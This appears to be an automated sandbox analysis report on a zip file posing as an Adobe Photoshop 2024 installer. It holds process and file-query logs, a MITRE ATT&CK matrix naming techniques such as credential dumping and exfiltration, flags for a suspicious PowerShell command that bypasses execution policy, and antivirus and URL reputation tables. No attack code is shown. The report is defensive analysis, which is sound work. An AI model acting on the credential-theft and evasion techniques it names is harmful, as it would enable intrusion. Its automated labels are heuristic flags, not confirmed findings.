Source: C:\Users\user\AppData\Local\Temp\o5y53bbg.hyg\Adobe_Photoshop_2024.exeQueries volume information: C:\Users\user\AppData\Local\Temp\o5y53bbg.hyg\SShop.Business.dll VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\o5y53bbg.hyg\Adobe_Photoshop_2024.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\o5y53bbg.hyg\Adobe_Photoshop_2024.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\o5y53bbg.hyg\Adobe_Photoshop_2024.exeQueries volume information: C:\Users\user\AppData\Local\Temp\o5y53bbg.hyg\NPoco.dll VolumeInformationJump to behavior
Source: C:\Users\user\AppData\Local\Temp\o5y53bbg.hyg\Adobe_Photoshop_2024.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ValueTuple\v4.0_4.0.0.0__cc7b13ffcd2ddd51\System.ValueTuple.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Management.Infrastructure.CimCmdlets\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.CimCmdlets.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Management.Infrastructure\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.dll VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\unarchiver.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
Source: AdobePIP.dllBinary or memory string: Load this lib in apip lib path failed: E:\workspace\RT_Win_8_0\Mainline\AdobePIP\source\__win__\AdobePIPLibraryLoader.hppget current process path failedLoad this lib in current process path failed: LogSession.dllUTInitializeUTInitializeCacheUTStartSessionUTLogEventUTAddToSessionUTNewDataGroupUTAddToGroupUTSessionCrashUTCloseSessionUTSetSerializationStateUTIsLogGeneratingRequiredUTIsThorNoticeShowedUTIsLogSessionActive..\..\source\AdobePIPHeadLightsAPIRepository.cppUTInitializeFctPtr is NULLUTInitialize: enableCrashDetection is UTStartSessionFctPtr is NULLUTStartSession: appfamily: appname: appversion: appbuild: applanguage: UTNewDataGroupFctPtr is NULLUTAddToGroupFctPtr is NULL groupId: %d key: value:UTSessionCrashFctPtr is NULLUTInitializeCachePTR is NULLUTCloseSessionFctPtr is NULLUTSetSerializationStatePtr is NULLUTIsLogGeneratingRequiredPtr is NULLUTIsThorNoticeShowedPtr is NULLAdobePIP_dllHB_LibVersionAdobePIP..\..\source\AdobePIPHLLog.cppQuestionsSonarscorecommentsTRUEcontactForFeedbackFALSESonarUserActionuserActionisNeverShowAgainCrashDialogCrashCountUTStartSession return NULL handle================== Starting AdobePIP Loging ==================8.0.0.52.48027AdobePIP version: ================================================================
Source: AdobePIP.dllBinary or memory string: E:\workspace\RT_Win_8_0\Mainline\public\binary\Win\x64\Release\AdobePIP.pdb
Source: AdobePIP.dllBinary or memory string: E:\workspace\RT_Win_8_0\Mainline\public\binary\Win\x64\Release\AdobePIP.pdb<<
Source: AdobePIP.dllBinary or memory string: E:\workspace\RT_Win_8_0\Mainline\AdobePIP\source\__win__\AdobePIPLibraryLoader.hpp

Mitre Att&ck Matrix

ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity InformationAcquire InfrastructureValid Accounts2
Command and Scripting Interpreter		1
DLL Side-Loading		12
Process Injection		1
Masquerading		OS Credential Dumping1
Security Software Discovery		Remote Services1
Archive Collected Data		1
Encrypted Channel		Exfiltration Over Other Network MediumAbuse Accessibility Features
CredentialsDomainsDefault Accounts2
PowerShell		Boot or Logon Initialization Scripts1
DLL Side-Loading		1
Disable or Modify Tools		LSASS Memory2
Process Discovery		Remote Desktop ProtocolData from Removable MediaJunk DataExfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)51
Virtualization/Sandbox Evasion		Security Account Manager51
Virtualization/Sandbox Evasion		SMB/Windows Admin SharesData from Network Shared DriveSteganographyAutomated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook12
Process Injection		NTDS1
Application Window Discovery		Distributed Component Object ModelInput CaptureProtocol ImpersonationTraffic DuplicationData Destruction
Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
Obfuscated Files or Information		LSA Secrets13
System Information Discovery		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
Timestomp		Cached Domain CredentialsWi-Fi DiscoveryVNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
DLL Side-Loading		DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery

Behavior Graph

Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 process2 2 Behavior Graph ID: 1509259 Sample: Adobe_Photoshop_2024 (1).zip Startdate: 11/09/2024 Architecture: WINDOWS Score: 52 8 unarchiver.exe 4 2->8         started        process3 10 cmd.exe 1 8->10         started        12 7za.exe 62 8->12         started        file4 15 Adobe_Photoshop_2024.exe 5 10->15         started        18 conhost.exe 10->18         started        27 C:\Users\user\...\Adobe_Photoshop_2024.exe, PE32 12->27 dropped 29 C:\Users\user\...\SShop.DiagramNet.dll, PE32 12->29 dropped 31 C:\Users\user\AppData\...\SShop.Data.dll, PE32 12->31 dropped 33 12 other files (none is malicious) 12->33 dropped 20 conhost.exe 12->20         started        process5 signatures6 37 Suspicious powershell command line found 15->37 39 Bypasses PowerShell execution policy 15->39 22 powershell.exe 21 15->22         started        process7 signatures8 35 Loading BitLocker PowerShell Module 22->35 25 conhost.exe 22->25         started        process9

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

SourceDetectionScannerLabelLink
Adobe_Photoshop_2024 (1).zip0%ReversingLabs
Adobe_Photoshop_2024 (1).zip1%VirustotalBrowse

Dropped Files

SourceDetectionScannerLabelLink
C:\Users\user\AppData\Local\Temp\o5y53bbg.hyg\AdobeOwl.dll0%ReversingLabs
C:\Users\user\AppData\Local\Temp\o5y53bbg.hyg\AdobePIP.dll0%ReversingLabs
C:\Users\user\AppData\Local\Temp\o5y53bbg.hyg\Adobe_Photoshop_2024.exe0%ReversingLabs
C:\Users\user\AppData\Local\Temp\o5y53bbg.hyg\NPoco.dll0%ReversingLabs
C:\Users\user\AppData\Local\Temp\o5y53bbg.hyg\Ninject.dll0%ReversingLabs
C:\Users\user\AppData\Local\Temp\o5y53bbg.hyg\PSLibs.exe0%ReversingLabs
C:\Users\user\AppData\Local\Temp\o5y53bbg.hyg\Photoshop.dll0%ReversingLabs
C:\Users\user\AppData\Local\Temp\o5y53bbg.hyg\PhotoshopCloud.dll0%ReversingLabs
C:\Users\user\AppData\Local\Temp\o5y53bbg.hyg\PhotoshopViews.dll0%ReversingLabs
C:\Users\user\AppData\Local\Temp\o5y53bbg.hyg\SShop.Base.dll0%ReversingLabs
C:\Users\user\AppData\Local\Temp\o5y53bbg.hyg\SShop.Business.XmlSerializers.dll0%ReversingLabs
C:\Users\user\AppData\Local\Temp\o5y53bbg.hyg\SShop.Business.dll0%ReversingLabs
C:\Users\user\AppData\Local\Temp\o5y53bbg.hyg\SShop.Contracts.dll0%ReversingLabs
C:\Users\user\AppData\Local\Temp\o5y53bbg.hyg\SShop.Data.dll0%ReversingLabs
C:\Users\user\AppData\Local\Temp\o5y53bbg.hyg\SShop.DiagramNet.dll0%ReversingLabs

Unpacked PE Files

No Antivirus matches

Domains

No Antivirus matches

URLs

SourceDetectionScannerLabelLink
http://crt.sectigo.com/SectigoPublicTimeStampingCAR36.crt0#0%URL Reputationsafe
https://contoso.com/License0%URL Reputationsafe
http://crl.sectigo.com/SectigoPublicTimeStampingRootR46.crl00%URL Reputationsafe
https://contoso.com/0%URL Reputationsafe
https://nuget.org/nuget.exe0%URL Reputationsafe
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name0%URL Reputationsafe
http://crt.sectigo.com/SectigoPublicTimeStampingRootR46.p7c0#0%URL Reputationsafe
http://nuget.org/NuGet.exe0%URL Reputationsafe
http://pesterbdd.com/images/Pester.png0%URL Reputationsafe
https://contoso.com/Icon0%URL Reputationsafe
http://crl.sectigo.com/SectigoPublicTimeStampingCAR36.crl0z0%URL Reputationsafe
http://www.fu.gov.si/:ErrorCode0%Avira URL Cloudsafe
http://www.fu.gov.si/:Error0%Avira URL Cloudsafe
http://ocsp.sectigo.com00%Avira URL Cloudsafe
http://crl.sectigo.com/SectigoPublicCodeSigningRootR46.crl00%Avira URL Cloudsafe
http://schemas.xmlsoap.org/soap/envelope/0%Avira URL Cloudsafe
http://www.fu.gov.si/uhttp://vizualiziraj.si/eInvoiceVizualization_20110530.xslt0%Avira URL Cloudsafe
http://crl.sectigo.com/SectigoPublicCodeSigningRootR46.crl00%VirustotalBrowse
http://crt.sectigo.com/SectigoPublicCodeSigningRootR46.p7c0#0%Avira URL Cloudsafe
http://uri.etsi.org/01903/v1.1.1#0%Avira URL Cloudsafe
http://www.fu.gov.si/:Error0%VirustotalBrowse
http://schemas.xmlsoap.org/soap/envelope/0%VirustotalBrowse
http://www.gzs.si/shemas/eslog/racun/1.6#RacunChttp://uri.etsi.org/01903/v1.1.1#0%Avira URL Cloudsafe
http://www.fu.gov.si/T0%Avira URL Cloudsafe
http://www.ecb.europa.eu/stats/eurofxref/eurofxref-daily.xml0%Avira URL Cloudsafe
http://www.fu.gov.si/:ErrorCode0%VirustotalBrowse
https://aka.ms/pscore6lB0%Avira URL Cloudsafe
https://blagajne.fu.gov.si:9009/v1/cash_registers0%Avira URL Cloudsafe
http://crt.sectigo.com/SectigoPublicCodeSigningRootR46.p7c0#0%VirustotalBrowse
https://blagajne.fu.gov.si:9003/v1/cash_registers0%Avira URL Cloudsafe
http://www.fu.gov.si/:ErrorMessage0%Avira URL Cloudsafe
http://www.ecb.europa.eu/stats/eurofxref/eurofxref-daily.xml0%VirustotalBrowse
http://uri.etsi.org/01903/v1.1.1#0%VirustotalBrowse
http://www.fu.gov.si/uhttp://vizualiziraj.si/eInvoiceVizualization_20110530.xslt0%VirustotalBrowse
http://www.fu.gov.si/:UniqueInvoiceID0%Avira URL Cloudsafe
http://www.fu.gov.si/0%Avira URL Cloudsafe
http://www.fu.gov.si/:DateTime0%Avira URL Cloudsafe
http://www.gzs.si/e-poslovanje/sheme/eSLOG_1-5_EnostavniRacun.xsd0%Avira URL Cloudsafe
http://www.fu.gov.si/T0%VirustotalBrowse
http://www.gzs.si/e-poslovanje/sheme/eSLOG_1-6_EnostavniRacun.xsd0%Avira URL Cloudsafe
http://crl.microso90%Avira URL Cloudsafe
http://www.fu.gov.si/90%Avira URL Cloudsafe
https://sectigo.com/CPS00%Avira URL Cloudsafe
http://www.fu.gov.si/:BusinessPremiseResponseEhttp://www.fu.gov.si/:EchoResponse0%Avira URL Cloudsafe
http://www.fu.gov.si/30%Avira URL Cloudsafe
http://www.apache.org/licenses/LICENSE-2.0.html0%Avira URL Cloudsafe
http://www.fu.gov.si/:MessageID0%Avira URL Cloudsafe
https://go.micro0%Avira URL Cloudsafe
https://github.com/ninject/Ninject0%Avira URL Cloudsafe
http://wolframalpha.com0%Avira URL Cloudsafe
http://crt.sectigo.com/SectigoPublicCodeSigningCAR36.crt0#0%Avira URL Cloudsafe
http://www.bizbox.eu/XSL/2019/06/visualization_eSlog20_bizBox_SL_rev.xslt0%Avira URL Cloudsafe
http://www.gzs.si/shemas/eslog/racun/1.6#Racun0%Avira URL Cloudsafe
http://moj.minimax.si/ip/doc/schemas/miniMAXUvozKnjigovodstvo0%Avira URL Cloudsafe
http://www.fu.gov.si/&0%Avira URL Cloudsafe
http://moj.minimax.si/ip/doc/schemas/miniMAXUvozKnjigovodstvoT0%Avira URL Cloudsafe
http://uri.etsi.org/01903/v1.1.1#SignedProperties0%Avira URL Cloudsafe
https://github.com/Pester/Pester0%Avira URL Cloudsafe
http://www.fu.gov.si/:Header0%Avira URL Cloudsafe
https://blagajne-test.fu.gov.si:9002/v1/cash_registers0%Avira URL Cloudsafe
http://www.fu.gov.si/-BusinessPremiseRequest0%Avira URL Cloudsafe
http://crl.sectigo.com/SectigoRSATimeStampingCA.crl0t0%Avira URL Cloudsafe
http://crl.sectigo.com/SectigoPublicCodeSigningCAR36.crl0y0%Avira URL Cloudsafe
http://crt.sectigo.com/SectigoRSATimeStampingCA.crt0#0%Avira URL Cloudsafe
https://blagajne.fu.gov.si:9009/v1/cash_registerschttps://blagajne.fu.gov.si:9003/v1/cash_registersK0%Avira URL Cloudsafe
http://www.fu.gov.si/:InvoiceResponse0%Avira URL Cloudsafe
http://vizualiziraj.si/eInvoiceVizualization_20110530.xslt0%Avira URL Cloudsafe
http://developer.download.nvidia.com/shaderlibrary/docs/shadow_PCSS.pdf0%Avira URL Cloudsafe
http://www.fu.gov.si/:InvoiceResponse0%VirustotalBrowse
https://blagajne.fu.gov.si:9009/v1/cash_registerschttps://blagajne.fu.gov.si:9003/v1/cash_registersK0%VirustotalBrowse
http://crt.sectigo.com/SectigoRSATimeStampingCA.crt0#0%VirustotalBrowse
http://developer.download.nvidia.com/shaderlibrary/docs/shadow_PCSS.pdf0%VirustotalBrowse
http://vizualiziraj.si/eInvoiceVizualization_20110530.xslt0%VirustotalBrowse

Domains and IPs

Contacted Domains

No contacted domains info

URLs from Memory and Binaries

NameSourceMaliciousAntivirus DetectionReputation
http://www.fu.gov.si/:ErrorSShop.Business.XmlSerializers.dllfalse
  • 0%, Virustotal, Browse
  • Avira URL Cloud: safe
unknown
http://crt.sectigo.com/SectigoPublicTimeStampingCAR36.crt0#SShop.Business.XmlSerializers.dll, SShop.Business.dll, SShop.Contracts.dll, SShop.Data.dllfalse
  • URL Reputation: safe
unknown
http://crl.sectigo.com/SectigoPublicCodeSigningRootR46.crl0Adobe_Photoshop_2024.exe, NPoco.dll, Ninject.dll, SShop.Business.XmlSerializers.dll, SShop.Business.dll, SShop.Contracts.dll, SShop.Data.dll, SShop.DiagramNet.dllfalse
  • 0%, Virustotal, Browse
  • Avira URL Cloud: safe
unknown
http://ocsp.sectigo.com0Adobe_Photoshop_2024.exe, NPoco.dll, Ninject.dll, SShop.Business.XmlSerializers.dll, SShop.Business.dll, SShop.Contracts.dll, SShop.Data.dll, SShop.DiagramNet.dllfalse
  • Avira URL Cloud: safe
unknown
http://www.fu.gov.si/:ErrorCodeSShop.Business.XmlSerializers.dllfalse
  • 0%, Virustotal, Browse
  • Avira URL Cloud: safe
unknown
https://contoso.com/Licensepowershell.exe, 00000008.00000002.2093251897.0000000006417000.00000004.00000800.00020000.00000000.sdmpfalse
  • URL Reputation: safe
unknown
http://schemas.xmlsoap.org/soap/envelope/SShop.Business.dllfalse
  • 0%, Virustotal, Browse
  • Avira URL Cloud: safe
unknown
http://www.fu.gov.si/uhttp://vizualiziraj.si/eInvoiceVizualization_20110530.xsltAdobe_Photoshop_2024.exe, 00000006.00000002.2106542470.00000000057C6000.00000002.00000001.01000000.0000000C.sdmp, SShop.Business.dllfalse
  • 0%, Virustotal, Browse
  • Avira URL Cloud: safe
unknown
http://crt.sectigo.com/SectigoPublicCodeSigningRootR46.p7c0#Adobe_Photoshop_2024.exe, NPoco.dll, Ninject.dll, SShop.Business.XmlSerializers.dll, SShop.Business.dll, SShop.Contracts.dll, SShop.Data.dll, SShop.DiagramNet.dllfalse
  • 0%, Virustotal, Browse
  • Avira URL Cloud: safe
unknown
http://uri.etsi.org/01903/v1.1.1#Adobe_Photoshop_2024.exefalse
  • 0%, Virustotal, Browse
  • Avira URL Cloud: safe
unknown
http://www.gzs.si/shemas/eslog/racun/1.6#RacunChttp://uri.etsi.org/01903/v1.1.1#Adobe_Photoshop_2024.exe, 00000006.00000002.2106542470.00000000057C6000.00000002.00000001.01000000.0000000C.sdmp, SShop.Business.dllfalse
  • Avira URL Cloud: safe
unknown
http://crl.sectigo.com/SectigoPublicTimeStampingRootR46.crl0SShop.Business.XmlSerializers.dll, SShop.Business.dll, SShop.Contracts.dll, SShop.Data.dllfalse
  • URL Reputation: safe
unknown
http://www.ecb.europa.eu/stats/eurofxref/eurofxref-daily.xmlAdobe_Photoshop_2024.exe, Adobe_Photoshop_2024.exe, 00000006.00000002.2106542470.00000000057C6000.00000002.00000001.01000000.0000000C.sdmp, SShop.Business.dllfalse
  • 0%, Virustotal, Browse
  • Avira URL Cloud: safe
unknown
http://www.fu.gov.si/TAdobe_Photoshop_2024.exe, 00000006.00000002.2106542470.00000000057C6000.00000002.00000001.01000000.0000000C.sdmp, SShop.Business.dllfalse
  • 0%, Virustotal, Browse
  • Avira URL Cloud: safe
unknown
https://aka.ms/pscore6lBpowershell.exe, 00000008.00000002.2091411811.00000000053B1000.00000004.00000800.00020000.00000000.sdmpfalse
  • Avira URL Cloud: safe
unknown
https://blagajne.fu.gov.si:9009/v1/cash_registersAdobe_Photoshop_2024.exefalse
  • Avira URL Cloud: safe
unknown
https://contoso.com/powershell.exe, 00000008.00000002.2093251897.0000000006417000.00000004.00000800.00020000.00000000.sdmpfalse
  • URL Reputation: safe
unknown
https://nuget.org/nuget.exepowershell.exe, 00000008.00000002.2093251897.0000000006417000.00000004.00000800.00020000.00000000.sdmpfalse
  • URL Reputation: safe
unknown
https://blagajne.fu.gov.si:9003/v1/cash_registersAdobe_Photoshop_2024.exefalse
  • Avira URL Cloud: safe
unknown
http://www.fu.gov.si/:ErrorMessageSShop.Business.XmlSerializers.dllfalse
  • Avira URL Cloud: safe
unknown
http://www.fu.gov.si/:UniqueInvoiceIDSShop.Business.XmlSerializers.dllfalse
  • Avira URL Cloud: safe
unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000008.00000002.2091411811.00000000053B1000.00000004.00000800.00020000.00000000.sdmpfalse
  • URL Reputation: safe
unknown
http://www.fu.gov.si/SShop.Business.dllfalse
  • Avira URL Cloud: safe
unknown
http://www.fu.gov.si/:DateTimeSShop.Business.XmlSerializers.dllfalse
  • Avira URL Cloud: safe
unknown
http://www.gzs.si/e-poslovanje/sheme/eSLOG_1-5_EnostavniRacun.xsdAdobe_Photoshop_2024.exefalse
  • Avira URL Cloud: safe
unknown
http://www.gzs.si/e-poslovanje/sheme/eSLOG_1-6_EnostavniRacun.xsdAdobe_Photoshop_2024.exefalse
  • Avira URL Cloud: safe
unknown
http://crl.microso9powershell.exe, 00000008.00000002.2097751985.0000000008AA6000.00000004.00000020.00020000.00000000.sdmpfalse
  • Avira URL Cloud: safe
unknown
http://crt.sectigo.com/SectigoPublicTimeStampingRootR46.p7c0#SShop.Business.XmlSerializers.dll, SShop.Business.dll, SShop.Contracts.dll, SShop.Data.dllfalse
  • URL Reputation: safe
unknown
http://nuget.org/NuGet.exepowershell.exe, 00000008.00000002.2093251897.0000000006417000.00000004.00000800.00020000.00000000.sdmpfalse
  • URL Reputation: safe
unknown
http://www.fu.gov.si/9Adobe_Photoshop_2024.exe, 00000006.00000002.2106542470.00000000057C6000.00000002.00000001.01000000.0000000C.sdmp, SShop.Business.dllfalse
  • Avira URL Cloud: safe
unknown
http://www.fu.gov.si/:BusinessPremiseResponseEhttp://www.fu.gov.si/:EchoResponseSShop.Business.XmlSerializers.dllfalse
  • Avira URL Cloud: safe
unknown
https://sectigo.com/CPS0Adobe_Photoshop_2024.exe, NPoco.dll, Ninject.dll, SShop.Business.XmlSerializers.dll, SShop.Business.dll, SShop.Contracts.dll, SShop.Data.dll, SShop.DiagramNet.dllfalse
  • Avira URL Cloud: safe
unknown
http://www.fu.gov.si/3Adobe_Photoshop_2024.exe, 00000006.00000002.2106542470.00000000057C6000.00000002.00000001.01000000.0000000C.sdmp, SShop.Business.dllfalse
  • Avira URL Cloud: safe
unknown
http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000008.00000002.2091411811.0000000005507000.00000004.00000800.00020000.00000000.sdmpfalse
  • URL Reputation: safe
unknown
http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000008.00000002.2091411811.0000000005507000.00000004.00000800.00020000.00000000.sdmpfalse
  • Avira URL Cloud: safe
unknown
http://www.fu.gov.si/:MessageIDSShop.Business.XmlSerializers.dllfalse
  • Avira URL Cloud: safe
unknown
https://go.micropowershell.exe, 00000008.00000002.2091411811.0000000005AA6000.00000004.00000800.00020000.00000000.sdmpfalse
  • Avira URL Cloud: safe
unknown
https://github.com/ninject/NinjectNinject.dllfalse
  • Avira URL Cloud: safe
unknown
http://wolframalpha.comPhotoshop.dllfalse
  • Avira URL Cloud: safe
unknown
https://contoso.com/Iconpowershell.exe, 00000008.00000002.2093251897.0000000006417000.00000004.00000800.00020000.00000000.sdmpfalse
  • URL Reputation: safe
unknown
http://crt.sectigo.com/SectigoPublicCodeSigningCAR36.crt0#Adobe_Photoshop_2024.exe, NPoco.dll, Ninject.dll, SShop.Business.XmlSerializers.dll, SShop.Business.dll, SShop.Contracts.dll, SShop.Data.dll, SShop.DiagramNet.dllfalse
  • Avira URL Cloud: safe
unknown
http://www.bizbox.eu/XSL/2019/06/visualization_eSlog20_bizBox_SL_rev.xsltAdobe_Photoshop_2024.exe, Adobe_Photoshop_2024.exe, 00000006.00000002.2106542470.00000000057C6000.00000002.00000001.01000000.0000000C.sdmp, SShop.Business.dllfalse
  • Avira URL Cloud: safe
unknown
http://www.gzs.si/shemas/eslog/racun/1.6#RacunAdobe_Photoshop_2024.exefalse
  • Avira URL Cloud: safe
unknown
http://moj.minimax.si/ip/doc/schemas/miniMAXUvozKnjigovodstvoSShop.Business.dllfalse
  • Avira URL Cloud: safe
unknown
http://www.fu.gov.si/&Adobe_Photoshop_2024.exe, 00000006.00000002.2106542470.00000000057C6000.00000002.00000001.01000000.0000000C.sdmp, SShop.Business.dllfalse
  • Avira URL Cloud: safe
unknown
http://moj.minimax.si/ip/doc/schemas/miniMAXUvozKnjigovodstvoTAdobe_Photoshop_2024.exe, 00000006.00000002.2106542470.00000000057C6000.00000002.00000001.01000000.0000000C.sdmp, SShop.Business.dllfalse
  • Avira URL Cloud: safe
unknown
http://uri.etsi.org/01903/v1.1.1#SignedPropertiesAdobe_Photoshop_2024.exe, Adobe_Photoshop_2024.exe, 00000006.00000002.2106542470.00000000057C6000.00000002.00000001.01000000.0000000C.sdmp, SShop.Business.dllfalse
  • Avira URL Cloud: safe
unknown
https://github.com/Pester/Pesterpowershell.exe, 00000008.00000002.2091411811.0000000005507000.00000004.00000800.00020000.00000000.sdmpfalse
  • Avira URL Cloud: safe
unknown
http://www.fu.gov.si/:HeaderSShop.Business.XmlSerializers.dllfalse
  • Avira URL Cloud: safe
unknown
https://blagajne-test.fu.gov.si:9002/v1/cash_registersSShop.Business.dllfalse
  • Avira URL Cloud: safe
unknown
http://www.fu.gov.si/-BusinessPremiseRequestSShop.Business.XmlSerializers.dllfalse
  • Avira URL Cloud: safe
unknown
http://crl.sectigo.com/SectigoRSATimeStampingCA.crl0tAdobe_Photoshop_2024.exe, NPoco.dll, Ninject.dll, SShop.DiagramNet.dllfalse
  • Avira URL Cloud: safe
unknown
http://crl.sectigo.com/SectigoPublicCodeSigningCAR36.crl0yAdobe_Photoshop_2024.exe, NPoco.dll, Ninject.dll, SShop.Business.XmlSerializers.dll, SShop.Business.dll, SShop.Contracts.dll, SShop.Data.dll, SShop.DiagramNet.dllfalse
  • Avira URL Cloud: safe
unknown
http://crl.sectigo.com/SectigoPublicTimeStampingCAR36.crl0zSShop.Business.XmlSerializers.dll, SShop.Business.dll, SShop.Contracts.dll, SShop.Data.dllfalse
  • URL Reputation: safe
unknown
http://crt.sectigo.com/SectigoRSATimeStampingCA.crt0#Adobe_Photoshop_2024.exe, NPoco.dll, Ninject.dll, SShop.DiagramNet.dllfalse
  • 0%, Virustotal, Browse
  • Avira URL Cloud: safe
unknown
https://blagajne.fu.gov.si:9009/v1/cash_registerschttps://blagajne.fu.gov.si:9003/v1/cash_registersKAdobe_Photoshop_2024.exe, 00000006.00000002.2106542470.00000000057C6000.00000002.00000001.01000000.0000000C.sdmp, SShop.Business.dllfalse
  • 0%, Virustotal, Browse
